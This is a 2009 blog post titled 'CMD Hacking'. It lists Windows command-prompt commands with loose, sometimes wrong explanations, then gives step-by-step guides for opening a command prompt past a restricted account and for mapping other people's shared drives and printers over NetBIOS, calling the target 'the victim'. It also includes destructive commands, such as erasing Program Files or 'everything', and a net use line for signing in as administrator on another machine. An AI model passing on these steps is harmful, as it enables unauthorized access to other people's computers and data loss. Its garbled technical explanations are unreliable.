Tuesday, December 22, 2009

CMD Hacking

Brief definitions of most used commands
For use in command prompt on you own computer, hacking, network
* CMD or command.com = use whichever works best or whichever one is available ( to open command prompt in the run command.
* EXIT = exit the command prompt
* PATH = displays the places that if will look for if not in the name first
* CLS = clears up everything on command prompt page
* TIME = displays time and you can change it if you want
* HELP = displays help, more commands
* DIR OR DIR /? = Shows a lot of information
* CD\PROGRA~1 ENTER THEN DIR = Programs installed (1)
* CD\ ENTER THEN DIR = shows installations of programs
* (DEL OR COPY OR DIR) *.* C:\TARGET = you can either delete, copy or dir a program
* NET = you get options to use it
* SHUTDOWN –LETTER OR SHUTDOWN/? = you can shutdown
free page hit counter
Your computer or another computer
* NETSTAT = view the stats of the computers one feature is
to get people’s I.P. for more type netstat/?
* FSUTIL AND FSUTIL FSINFO = shows you things like list of
all drives
* IPCONFIG OR IPCONFIG/ALL = shows you I.P. and all others
in a network
* ERASE C:\PROGRAM FILES = erases all program files or leave
just the c delete everything
* NBTSTAT = GETTING INFORMATION ON YOUR COMPUTER
AND OTHERS
* TREE = displays all files on program files and desktop good
for seeing if you have any keyloggers
* TRACERT (IP) = to see if the I.P. exist
* NET USE C: \\PCNAME\C$ /USER: PCNAME\ADMINISTRATOR
= to sign in as an administrator that’s not signed in
* NSLOOKUP SET TYPE=MX EXP:HOTMAIL.COM = getting ips
from web sites
* /WHOIS (SCREENAME) = only on a chat room, to find
information a that person which owns the screename an I.P.
For use in command prompt for path chanching
* DISKPART = shows you stuff like the computer name and
takes you to disk part option
* CD\PROGRA~1 ENTER THEN DIR = Programs installed (2)
* CD \WINDOWS \SYSTEM = to look for stuff in this folders
* TELNET : remote controlling
* NET START MESSENGER = start net send when it is disable
For use in command prompt only on a network or hacking
* BOOTCFG = you can make changes to boot the computer ,
boot it mess it up
* GPRESULT = shows all the information of a computer
* DRIVERQUERY = list of drives and their properties
* GETMAC = this gets the Mac (media access control) address
* NETSH = good for hacking a network configuration tool
type netsh /? For more
* OPENFILES = only for windows professional allows an
administrator to display or disconnect open files
* REG = THE CONSOLE REGISTRY TOOL
* SYSTEMINFO = info
* TASKLIST AND TASKKILL = LIKE PRESING CTRL+ALT+DELETE

In this step by step guide you will learn about: using the command prompt under a limited account.
Things to remember
* CP = Command Prompt
* HDs = Hard Drives
I will explain two methods of doing this (in case one doesn't work for you)
Fist Method (NEW & IMPROVED)
Step by step:
1. Go to the C:\ drive if it's block and you don't know how to get to it go to Hacking C:\ Drives and then continue to step #2.
2. When on the C:\ drive go to the directory C:\windows\system32 and click search at the top of the window click all files and folders.
3. In the search space type command.
4. The search will probably give back command prompt and another called command. Make sure to you choose the one that says only command NOT command prompt.
5. There you go, your in command prompt and is fully usable.

Second Method (NEW & IMPROVED)
Step by step:
1. First, open a notepad file (if your network blocks notepad, open a webpage, right click and go to view source, notepad!).
2. Now write
command.com
3. save the file as batch.bat, or anything with the extension.bat Open this file and it will give you a command prompt.

In this step by step guide you will learn about: How to Hack Network Hard Drives using the command prompt.
Things to remember
* CP = Command Prompt
* HDs = Hard Drives
Step by Step:
1. Open command prompt if it's block and you don't know how to get to it go to Using the command prompt under a limited account and then continue to step #2.
2. Once in command prompt type
c:\windows>nbtstat -a 203.195.136.156
(instead of the I.P. address type the real I.P. address or the name of the computer your trying to get to) and if you don't know how to get the name of the computer then go to what to do after hacking the C:\ drive and then continue to step #3.
3. Let say that it gives you this
NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
user <00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered
MAC Address = 00-02-44-14-23-E6
The number <20> shows that the victim has enabled the File And Printer Sharing.
-------------------------------------
NOTE - If you do not get this number there are three possible answers
A. You do not get the number <20> . This shows that the victim has not enabled the File and Printer Sharing.
B. You get "Host Not found". This shows that the port 139 is closed or the ip address or computer name doesn't exist or the computer you are trying to get to is turned off.
C. its still doesn’t matter if you don't get the <20> because this is to hack hard drives and not printers
4. Now in command prompt type
c:\windows>net view \\203.195.136.156
Let's suppose we get the following output
Shared resources at \\203.195.136.156
The computer's name will be here
Share name Type Used as Comment
-------------------------------------------
CDISK Disk
The command completed successfully.
5. The name CDISK is one of the things that being shared on command prompt type (the word Disk at the side its just saying what the the thing being shared is a printer, disk or a file)
c:\windows>net use k: \\203.195.136.156\CDISK
You may replace k letter by any other letter, If the command is successful we will get the confirmation - The command was completed successfully
Now just double click on the My Computer icon on your desktop
and there will be a new drive there with the letter that you replaced K with.

In this step by step guide you will learn about: How to hack network printers using the command prompt
Things to remember
* CP = Command Prompt
* HDs = Hard Drives
Step by Step:
1. Open command prompt if it's block and you don't know how to get to it go to Using the command prompt under a limited account and then continue to step #2.
2. In command prompt type
c:\windows>nbtstat -a 203.195.136.156
(instead of the I.P. address type the real I.P. address or the name of the computer your trying to get to) and if you don't know how to get the name of the computer then go to what to do after hacking the C:\ drive and then continue to step #3.
3. Let say that it gives you this
NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
user <00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered
MAC Address = 00-02-44-14-23-E6
The number <20> shows that the victim has enabled the File And Printer Sharing.
-------------------------------------
NOTE - If you do not get this number there are two possible answers
A. You do not get the number <20>. This shows that the victim has not enabled the File and Printer Sharing. (SO STOP READING HERE BECAUSE IF DONT GET IT THAT MEANS THAT IT'S ALMOST IMPOSSIBLE TO GET TO THE PRINTER).
B. You get "Host Not found". This shows that the port 139 is closed or the ip address or computer name doesn't exist or the computer you are trying to get to is turned off.
4. Now in command prompt type
c:\windows>net view \\203.195.136.156
Let's suppose we get the following output
Shared resources at \\203.195.136.156
The computer's name will be here
Share name Type Used as Comment
-------------------------------------------
CDISK Disk
Hello Printer
The command completed successfully.
5. The name Hello is one of the printers that being shared on command prompt (the word Printer at the side its just saying what the thing being shared is a printer, disk or a file) now type
c:\windows>net use \\203.195.136.156\Hello
If the command is successful we will get the confirmation - The command was completed successfully
Now when you want to print anything the printer should be listed there so you can use it. Just select the printer named hello and click print.

No comments:

Explaining DNS Concepts - DNS Servers-DNS Queries-DNS Records

3 types of DNS queries— recursive, iterative, and non-recursive 3 types of DNS servers— DNS Resolver, DNS Root Server and Authoritative Name...